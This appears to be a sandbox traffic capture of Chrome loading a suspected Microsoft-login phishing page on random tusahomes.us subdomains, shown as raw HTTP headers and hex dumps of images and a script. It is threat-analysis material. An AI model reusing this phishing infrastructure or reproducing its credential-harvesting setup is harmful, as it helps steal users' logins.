                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001918Z-1686b48456frrpr2hC1SJCadqs0000000cy000000000q3wq
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                x-cache-info: L1_T2
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:18 UTC5566INData Raw: 1f 8b 08 00 00 00 00 00 00 ff ad 5b 6b 77 da 48 d2 fe 3e bf 42 68 f7 10 69 d3 96 ed 64 72 19 79 34 3e 0e 97 84 19 3b f6 1a 3c b3 99 24 87 23 50 03 8a 85 a4 51 0b 63 d6 f0 df df a7 ba 25 10 20 b0 33 ef e6 24 91 d5 5d 5d 5d 5d 5d f7 92 0f ff 55 f9 41 fb 97 76 f0 f4 3f 5a bb 73 76 dd d1 2e 9b 5a e7 43 eb ba ae 5d e1 ed 93 f6 f1 b2 d3 aa 35 9e 8e 87 36 a5 7f 9d 91 2f b4 81 1f 70 0d cf 9e 2b b8 a7 45 a1 16 25 9a 1f f6 a3 24 8e 12 37 e5 42 1b e3 ff c4 77 03 6d 90 44 63 2d 1d 71 2d 4e a2 6f bc 9f 0a 2d f0 45 8a 45 3d 1e 44 53 cd 00 ba c4 d3 ae dc 24 9d 69 ad 2b d3 02 7e 0e 6c fe d0 0f b1 ba 1f c5 33 fc 3c 4a b5 30 4a fd 3e d7 dc d0 93 d8 02 bc 84 82 6b 93 d0 e3 89 36 1d f9 fd 91 76 e1 f7 93 48 44 83 54 4b 78 9f fb 77 d8 44 4c 30 be be 05 d3 dc 84 6b 82 a7 da 20
                                                                Data Ascii: [kwH>Bhidry4>;<$#PQc% 3$]]]]]UAv?Zsv.ZC]56/p+E%$7BwmDc-q-No-EE=DS$i+~l3<J0J>k6vHDTKxwDL0k


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                38192.168.2.549759137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:16 UTC765OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:18 UTC761INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:18 GMT
                                                                Content-Type: image/gif
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                                etag: 0x8DB5C3F48EC4154
                                                                x-ms-request-id: 45caba1d-501e-007e-73b8-a524ae000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001918Z-1686b48456f5z9sphC1SJCb10g0000000crg00000000fqdu
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                2025-04-09 00:19:18 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                                2025-04-09 00:19:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                39192.168.2.549757137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:16 UTC759OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:18 UTC761INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:18 GMT
                                                                Content-Type: image/gif
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                etag: 0x8DB5C3F4904824B
                                                                x-ms-request-id: ddbc790c-001e-002e-71c3-a5e6fe000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001918Z-1686b48456fwvkj2hC1SJC580c0000000d1g00000000bgaz
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                2025-04-09 00:19:18 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                                2025-04-09 00:19:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                40192.168.2.549760137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:16 UTC756OUTGET /67f5bce71f9fd88e9ef40d75/ HTTP/1.1
                                                                Host: 330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Connection: Upgrade
                                                                Pragma: no-cache
                                                                Cache-Control: no-cache
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Upgrade: websocket
                                                                Origin: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us
                                                                Sec-WebSocket-Version: 13
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; MicrosoftApplicationsTelemetryDeviceId=22e4266d-2e12-4ea3-b94a-a6e90883bec6; brcap=0
                                                                Sec-WebSocket-Key: BeSkIIvmWJ0rwiS+oiWPig==
                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                2025-04-09 00:19:18 UTC720INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:18 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 0
                                                                Connection: close
                                                                cache-control: private
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                x-ms-request-id: b82159b7-241d-4665-b797-ffe2c8952b00
                                                                x-ms-ests-server: 2.1.20540.2 - SCUS ProdSlices
                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://a4eaec44075f43d19af55316af4b7550.tusahomes.us/api/report?catId=GW+estsfd+wst"}]}
                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                x-ms-srs: 1.P
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                41192.168.2.549761137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:18 UTC534OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:21 UTC761INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:21 GMT
                                                                Content-Type: image/gif
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                                etag: 0x8DB5C3F48EC4154
                                                                x-ms-request-id: 45caba1d-501e-007e-73b8-a524ae000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001920Z-1686b48456fml57shC1SJCr9kc00000003cg00000000h1dm
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                2025-04-09 00:19:21 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                                2025-04-09 00:19:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.549763137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:19 UTC759OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:21 UTC806INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:21 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                                etag: 0x8DB5C3F47E260FD
                                                                x-ms-request-id: cf27e4cf-001e-004c-7c16-a824d9000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001920Z-1686b48456frrpr2hC1SJCadqs0000000cyg00000000ns1s
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:21 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:21 UTC670INData Raw: 32 39 37 0d 0a b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 b9 75 c8 c2 62
                                                                Data Ascii: 297Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9Aub
                                                                2025-04-09 00:19:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.549762137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:19 UTC760OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:21 UTC806INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:21 GMT
                                                                Content-Type: image/svg+xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                etag: 0x8DB5C3F4911527F
                                                                x-ms-request-id: ddbf5f24-b01e-0014-71d6-a5fc86000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001920Z-1686b48456ffphmshC1SJCd29w0000000d1000000000dbkm
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
                                                                content-encoding: gzip
                                                                2025-04-09 00:19:21 UTC15INData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 0d 0a
                                                                Data Ascii: a
                                                                2025-04-09 00:19:21 UTC1432INData Raw: 35 39 31 0d 0a bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 62 55 12 3b 0e
                                                                Data Ascii: 591WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]hbU;
                                                                2025-04-09 00:19:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.549764137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:19 UTC816OUTGET /Me.htm?v=3 HTTP/1.1
                                                                Host: 8f0da58963954c5ebda6645ba9a83b28.tusahomes.us
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                sec-ch-ua-platform: "Windows"
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Sec-Fetch-Site: same-site
                                                                Sec-Fetch-Mode: navigate
                                                                Sec-Fetch-User: ?1
                                                                Sec-Fetch-Dest: iframe
                                                                Referer: https://330c68f2903044fdaf0390e944b7092d.tusahomes.us/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:21 UTC490INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:21 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Length: 3692
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                cache-control: max-age=315360000
                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-ms-route-info: C533_BL2
                                                                x-ms-request-id: ce608be9-a457-485c-ad25-0e795d68fefa
                                                                ppserver: PPV: 30 H: BL02EPF0001D8B4 V: 0
                                                                access-control-allow-origin: *
                                                                access-control-allow-headers: *
                                                                2025-04-09 00:19:21 UTC3692INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 65 29 74 5b 73 5d 3d 65 5b 73 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 69 66 28 73 5b 6e 5d 29 72 65 74 75 72 6e 20 73 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 73 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 65 2e 6d 3d 74
                                                                Data Ascii: <script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.549765137.184.178.2314436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:19:19 UTC528OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                Host: 69b4c8ec5bd242c881fabaa43bd7e0c7.tusahomes.us
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Sec-Fetch-Storage-Access: active
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: wZfUflpx=67f5bce71f9fd88e9ef40d75
                                                                2025-04-09 00:19:21 UTC761INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Wed, 09 Apr 2025 00:19:21 GMT
                                                                Content-Type: image/gif
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                cache-control: public, max-age=31536000
                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                etag: 0x8DB5C3F4904824B
                                                                x-ms-request-id: ddbc790c-001e-002e-71c3-a5e6fe000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                access-control-allow-origin: *
                                                                x-azure-ref: 20250409T001921Z-1686b48456f6tqmjhC1SJCnnpg0000000ctg00000000b29p
                                                                x-fd-int-roxy-purgeid: 4554691
                                                                x-cache: TCP_HIT
                                                                accept-ranges: bytes
